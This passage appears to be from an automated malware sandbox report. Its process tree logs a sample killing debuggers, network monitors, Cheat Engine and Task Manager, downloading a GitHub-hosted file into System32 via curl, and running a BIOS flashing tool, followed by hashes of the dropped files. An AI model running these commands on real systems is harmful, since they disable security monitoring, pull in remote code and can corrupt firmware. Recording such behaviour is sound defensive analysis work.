    - Executes dropped EXE
    PID:1416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4492
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:4440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /p
  2⤵
  PID:4076
- - C:\Windows\System32\AFUWINx64.EXE
    C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /p
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:2868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4344
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    PID:1012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:4004
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    PID:696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:3216
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    PID:4080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:4048
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    PID:2636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:4040
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    PID:216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:1352
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    PID:2572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:3384
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    PID:1980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:5096
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    PID:3284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:3152
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    PID:4736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:2576
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Kills process with taskkill
    PID:3800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:1476
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    PID:4996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:5000
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    - Kills process with taskkill
    PID:3092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:4676
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:4992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:1848
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    PID:2836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:2940
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    PID:3512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:372
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    PID:2340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:2384
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Kills process with taskkill
    PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:232
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    PID:1824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:2420
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:2496
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:4952
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:1424
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    PID:4624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:4928
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    PID:3436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1884
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:4796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2560
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:2308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4528
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:3364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:3008
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:4372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:4056
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:4164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:4440
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:1264
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:2852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:348
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    PID:2416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1100
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3780
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3032
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:1660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:540
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    PID:2712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:5052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:3344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3936
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4208
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:3500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:5092
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    PID:556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:3284
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    PID:5096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:4736
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    PID:936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:4572
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    PID:880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:1820
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    PID:968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:1588
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    PID:2988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:3940
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    PID:2816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:388
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    PID:4140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent -o C:\Windows\System32\Tasks\Mac.bat -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" https://github.com/zer0gra/perm-files/raw/main/BIOS.rom
  2⤵
  PID:4576
- - C:\Windows\system32\curl.exe
    curl --silent -o C:\Windows\System32\Tasks\Mac.bat -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" https://github.com/zer0gra/perm-files/raw/main/BIOS.rom
    3⤵
    - Drops file in System32 directory
    PID:1004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:2340
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Kills process with taskkill
    PID:4932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:3168
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    PID:1536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:232
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:2420
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:1388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /o
  2⤵
  PID:672
- - C:\Windows\System32\AFUWINx64.EXE
    C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /o
    3⤵
    - Executes dropped EXE
    PID:2580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:1612
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    PID:2676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /p
  2⤵
  PID:4192
- - C:\Windows\System32\AFUWINx64.EXE
    C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /p
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:1512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:2168
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:3492
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Kills process with taskkill
    PID:2308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:4296
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:3364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:2880
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    PID:100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:740
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:4356
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:1604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:3220
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:3576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:3888
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    - Kills process with taskkill
    PID:1264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:3540
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    PID:4344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1628
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3216
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    PID:3052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3748
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:2564
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:2056
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:3564
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:4448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:4100
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:1708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:1868
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1372
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:3152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2576
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1476
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:3332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:3604
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    PID:3096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:4200
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:4676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1912
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:4140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1428
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    PID:4588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:736
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    PID:4696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:2384
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    PID:3264

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:2976

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\System32\AFUWINx64.EXE

Filesize
1.1MB

MD5
9d0daba81cee203b0d39377baef9f4cb

SHA1
ed37746cbb5ed85c54aa90c3598b7069c194bad9

SHA256
1f12e8352afbb111918f2a3e7cdad8202ea4f55e691f1de55ac0bd58f2f96460

SHA512
cb29f7c6a71efa33652298f35cc878427806e2452a65c70079bf5f9fded7fb90500d9e73c96c85a2fdfa85587b7a7c365c7464e0e7b90832da6bfec3926f51cb

Download Submit
C:\Windows\System32\AMIDEWINx64.EXE

Filesize
455KB

MD5
9adfcdac59db3286690c7eede8da2528

SHA1
0b54d251438a634bd13b49a1f20587cf03d4598d

SHA256
13037eedd91f9313ec0d807947db65c639642e5ae6497e87d12fa6d19951f78e

SHA512
fde1700cdb4212593ec2733944a169c7d02f436ca6831719a33482fbfd0be289697c9aa6ce7ddfb6c245e87952b35416929bbf69753d21a24197ac6c2d1243cc

Download Submit
C:\Windows\System32\Tasks\Mac.bat

Filesize
8KB

MD5
66375aaed608a59e75d96f40287eac0b

SHA1
6ca83fa1c5705efbec7800da453752276ad3cc97

SHA256
1b4f1bd9d5b61d2b1e21f57bfb109d2ac202639d16a25abd4fc05f17ca8b8368

SHA512
8f5ae0b3542e1efe9e5c8d9a13a177a57054ea1590a703796584acf1220ad21dd97132a5443fa28925220fc671571ad0d9389605c6b9135a76fe10ca54a80dbc

Download Submit
C:\Windows\System32\amifldrv64.sys

Filesize
29KB

MD5
f22740ba54a400fd2be7690bb204aa08

SHA1
5812387783d61c6ab5702213bb968590a18065e3

SHA256
65c26276cadda7a36f8977d1d01120edb5c3418be2317d501761092d5f9916c9

SHA512
ac1f89736cf348f634b526569b5783118a1a35324f9ce2f2804001e5a04751f8cc21d09bfa1c4803cd14a64152beba868f5ecf119f10fa3ccbe680d2fb481500

Download Submit